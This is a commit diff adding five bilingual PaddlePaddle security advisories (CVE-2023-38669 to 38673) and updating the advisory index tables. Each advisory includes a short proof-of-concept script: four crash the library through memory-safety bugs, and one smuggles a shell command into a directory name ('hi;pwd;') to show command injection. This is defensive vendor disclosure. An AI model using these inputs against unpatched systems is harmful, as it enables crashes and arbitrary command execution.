update security advisory, test=document_fix (#55690)

security/README.md

@@ -7,7 +7,12 @@ We regularly publish security advisories about using PaddlePaddle.
 *Note*: In conjunction with these security advisories, we strongly encourage PaddlePaddle users to read and understand PaddlePaddle's security model as outlined in [SECURITY.md](../SECURITY.md).
 
 
-| Advisory Number                              | Type                    | Versions affected | Reported by                           | Additional Information |
-|----------------------------------------------|-------------------------|:-----------------:|---------------------------------------|------------------------|
-| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree |       < 2.4       | Wang Xuan(王旋) of Qihoo 360 AIVul Team |                        |
-| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University |                        |
+| Advisory Number                              | Type                                                 | Versions affected | Reported by                                                      | Additional Information |
+|----------------------------------------------|------------------------------------------------------|:-----------------:|------------------------------------------------------------------|------------------------|
+| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py                           |      < 2.5.0      | Xiaochen Guo from Huazhong University of Science and Technology  |                        |
+| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
+| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace                 |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
+| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip              |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
+| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
+| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window |    = 2.4.0-rc0    | Tong Liu of ShanghaiTech University                              |                        |
+| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree                              |       < 2.4       | Wang Xuan(王旋) of Qihoo 360 AIVul Team                            |                        |

security/README_cn.md

@@ -7,7 +7,12 @@
 注：我们非常建议飞桨用户阅读和理解[SECURITY_cn.md](../SECURITY_cn.md)所介绍的飞桨安全模型，以便更好地了解此安全公告。
 
 
-| 安全公告编号                                          | 类型                      | 受影响版本 | 报告者                                   | 备注  |
-|-------------------------------------------------|-------------------------|:-----:|---------------------------------------|-----|
-| [PDSA-2022-001](./advisory/pdsa-2022-001_cn.md) | OOB read in gather_tree | < 2.4 | Wang Xuan(王旋) of Qihoo 360 AIVul Team |     |
-| [PDSA-2022-002](./advisory/pdsa-2022-002_cn.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University |     |
+| 安全公告编号                                          | 类型                                                   |    受影响版本     | 报告者                                                             | 备注 |
+|-------------------------------------------------|------------------------------------------------------|:------------:|-----------------------------------------------------------------|----|
+| [PDSA-2023-005](./advisory/pdsa-2023-005_cn.md) | Command injection in fs.py                           |   < 2.5.0    | Xiaochen Guo from Huazhong University of Science and Technology |    |
+| [PDSA-2023-004](./advisory/pdsa-2023-004_cn.md) | FPE in paddle.linalg.matrix_power                    |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-003](./advisory/pdsa-2023-003_cn.md) | Heap buffer overflow in paddle.trace                 |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-002](./advisory/pdsa-2023-002_cn.md) | Null pointer dereference in paddle.flip              |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-001](./advisory/pdsa-2023-001_cn.md) | Use after free in paddle.diagonal                    |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2022-002](./advisory/pdsa-2022-002_cn.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0  | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2022-001](./advisory/pdsa-2022-001_cn.md) | OOB read in gather_tree                              |    < 2.4     | Wang Xuan(王旋) of Qihoo 360 AIVul Team                           |    |

security/advisory/pdsa-2023-001.md

+## PDSA-2023-001: Use after free in paddle.diagonal
+
+### CVE Number
+
+CVE-2023-38669
+
+### Impact
+
+Use after free in `paddle.diagonal`. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+from paddle import diagonal
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [1, 1, 1, 1]).astype(np.int64))
+offset = paddle.to_tensor(np.random.uniform(-10, 0, []).astype(np.int32))
+axis1 = paddle.to_tensor(np.random.uniform(-1000000, 0, []).astype(np.int32))
+axis2 = paddle.to_tensor(np.random.uniform(-10000000, 0, []).astype(np.int32))
+
+diagonal(x, offset, axis1, axis2)
+```
+
+### Patches
+
+We have patched the issue in commit [43981874f5e1683b855eab871092fa9be58d6a44](https://github.com/PaddlePaddle/Paddle/commit/43981874f5e1683b855eab871092fa9be58d6a44).
+The fix will be included in PaddlePaddle 2.5.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of ShanghaiTech University.

security/advisory/pdsa-2023-001_cn.md

+## PDSA-2023-001: Use after free in paddle.diagonal
+
+### CVE编号
+
+CVE-2023-38669
+
+### 影响
+
+`paddle.diagonal`中存在use after free，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+from paddle import diagonal
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [1, 1, 1, 1]).astype(np.int64))
+offset = paddle.to_tensor(np.random.uniform(-10, 0, []).astype(np.int32))
+axis1 = paddle.to_tensor(np.random.uniform(-1000000, 0, []).astype(np.int32))
+axis2 = paddle.to_tensor(np.random.uniform(-10000000, 0, []).astype(np.int32))
+
+diagonal(x, offset, axis1, axis2)
+```
+
+### 补丁
+
+我们在commit [43981874f5e1683b855eab871092fa9be58d6a44](https://github.com/PaddlePaddle/Paddle/commit/43981874f5e1683b855eab871092fa9be58d6a44)中对此问题进行了补丁。
+修复将包含在飞桨2.5.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of ShanghaiTech University 提交。

security/advisory/pdsa-2023-002.md

+## PDSA-2023-002: Null pointer dereference in paddle.flip
+
+### CVE Number
+
+CVE-2023-38670
+
+### Impact
+
+`paddle.flip` segfaults with a nullptr dereference. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+from paddle import flip
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [1, 2, 3]).astype(np.int64)),
+axis = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [3, 3]).astype(np.int32))
+
+flip(x, axis)
+```
+
+### Patches
+
+We have patched the issue in commit [ed96baeed19b4e11b6cbc2dcc6776245ba5fab13](https://github.com/PaddlePaddle/Paddle/commit/ed96baeed19b4e11b6cbc2dcc6776245ba5fab13).
+The fix will be included in PaddlePaddle 2.5.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of ShanghaiTech University.

security/advisory/pdsa-2023-002_cn.md

+## PDSA-2023-002: Null pointer dereference in paddle.flip
+
+### CVE编号
+
+CVE-2023-38670
+
+### 影响
+
+`paddle.flip`中存在空指针解引用，将导致程序运行时崩溃，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+from paddle import flip
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [1, 2, 3]).astype(np.int64)),
+axis = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [3, 3]).astype(np.int32))
+
+flip(x, axis)
+```
+
+### 补丁
+
+我们在commit [ed96baeed19b4e11b6cbc2dcc6776245ba5fab13](https://github.com/PaddlePaddle/Paddle/commit/ed96baeed19b4e11b6cbc2dcc6776245ba5fab13)中对此问题进行了补丁。
+修复将包含在飞桨2.5.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of ShanghaiTech University 提交。

security/advisory/pdsa-2023-003.md

+## PDSA-2023-003: Heap buffer overflow in paddle.trace
+
+### CVE Number
+
+CVE-2023-38671
+
+### Impact
+
+`paddle.trace` has a heap buffer overflow. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+from paddle import trace
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [2, 2, 2]).astype(np.float64))
+offset = paddle.to_tensor(np.random.uniform(-10, 10, []).astype(np.int32))
+axis1 = paddle.to_tensor(np.random.uniform(-6666666, -2, []).astype(np.int32))
+axis2 = paddle.to_tensor(np.random.uniform(-6666666, -2, []).astype(np.int32))
+
+trace(x, offset, axis1, axis2)
+```
+
+### Patches
+
+We have patched the issue in commit [12549dfe3e87a4c30f852d2eca81d7f67c8daa87](https://github.com/PaddlePaddle/Paddle/commit/12549dfe3e87a4c30f852d2eca81d7f67c8daa87).
+The fix will be included in PaddlePaddle 2.5.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of ShanghaiTech University.

security/advisory/pdsa-2023-003_cn.md

+## PDSA-2023-003: Heap buffer overflow in paddle.trace
+
+### CVE编号
+
+CVE-2023-38671
+
+### 影响
+
+`paddle.trace`中存在堆溢出漏洞，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+from paddle import trace
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [2, 2, 2]).astype(np.float64))
+offset = paddle.to_tensor(np.random.uniform(-10, 10, []).astype(np.int32))
+axis1 = paddle.to_tensor(np.random.uniform(-6666666, -2, []).astype(np.int32))
+axis2 = paddle.to_tensor(np.random.uniform(-6666666, -2, []).astype(np.int32))
+
+trace(x, offset, axis1, axis2)
+```
+
+### 补丁
+
+我们在commit [12549dfe3e87a4c30f852d2eca81d7f67c8daa87](https://github.com/PaddlePaddle/Paddle/commit/12549dfe3e87a4c30f852d2eca81d7f67c8daa87)中对此问题进行了补丁。
+修复将包含在飞桨2.5.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of ShanghaiTech University 提交。

security/advisory/pdsa-2023-004.md

+## PDSA-2023-004: FPE in paddle.linalg.matrix_power
+
+### CVE Number
+
+CVE-2023-38672
+
+### Impact
+
+When dim contains 0, `paddle.linalg.matrix_power` will trigger a float point exception. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+from paddle.linalg import matrix_power
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [1, 1, 0, 0]).astype(np.float32))
+
+matrix_power(x, -1)
+```
+
+### Patches
+
+We have patched the issue in commit [09926af166b060c9a9845c309110d3baa82921fd](https://github.com/PaddlePaddle/Paddle/commit/09926af166b060c9a9845c309110d3baa82921fd).
+The fix will be included in PaddlePaddle 2.5.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of ShanghaiTech University.

security/advisory/pdsa-2023-004_cn.md

+## PDSA-2023-004: FPE in paddle.linalg.matrix_power
+
+### CVE编号
+
+CVE-2023-38672
+
+### 影响
+
+当张量包含纬度值为0的情况，`paddle.linalg.matrix_power`会触发除0异常，导致程序运行时崩溃，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+from paddle.linalg import matrix_power
+
+x = paddle.to_tensor(np.random.uniform(-10, 10, [1, 1, 0, 0]).astype(np.float32))
+
+matrix_power(x, -1)
+```
+
+### 补丁
+
+我们在commit [09926af166b060c9a9845c309110d3baa82921fd](https://github.com/PaddlePaddle/Paddle/commit/09926af166b060c9a9845c309110d3baa82921fd)中对此问题进行了补丁。
+修复将包含在飞桨2.5.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of ShanghaiTech University 提交。

security/advisory/pdsa-2023-005.md

+## PDSA-2023-005: Command injection in fs.py
+
+### CVE Number
+
+CVE-2023-38673
+
+### Impact
+
+`os.system` in fs.py can lead to command injection. The PoC is as follows:
+
+```python
+from paddle.distributed.fleet.utils import LocalFS
+
+client = LocalFS()
+client.mkdirs("hi;pwd;")
+```
+
+### Patches
+
+We have patched the issue in commit [2bfe358043096fdba9e2a4cf0f5740102b37fd8f](https://github.com/PaddlePaddle/Paddle/commit/2bfe358043096fdba9e2a4cf0f5740102b37fd8f).
+The fix will be included in PaddlePaddle 2.5.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Xiaochen Guo from Huazhong University of Science and Technology.

security/advisory/pdsa-2023-005_cn.md

+## PDSA-2023-005: Command injection in fs.py
+
+### CVE编号
+
+CVE-2023-38673
+
+### 影响
+
+fs.py中的功能函数存在命令注入，可以执行任意命令，PoC代码如下：
+
+```python
+from paddle.distributed.fleet.utils import LocalFS
+
+client = LocalFS()
+client.mkdirs("hi;pwd;")
+```
+
+### 补丁
+
+我们在commit [2bfe358043096fdba9e2a4cf0f5740102b37fd8f](https://github.com/PaddlePaddle/Paddle/commit/2bfe358043096fdba9e2a4cf0f5740102b37fd8f)中对此问题进行了补丁。
+修复将包含在飞桨2.5.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Xiaochen Guo from Huazhong University of Science and Technology 提交。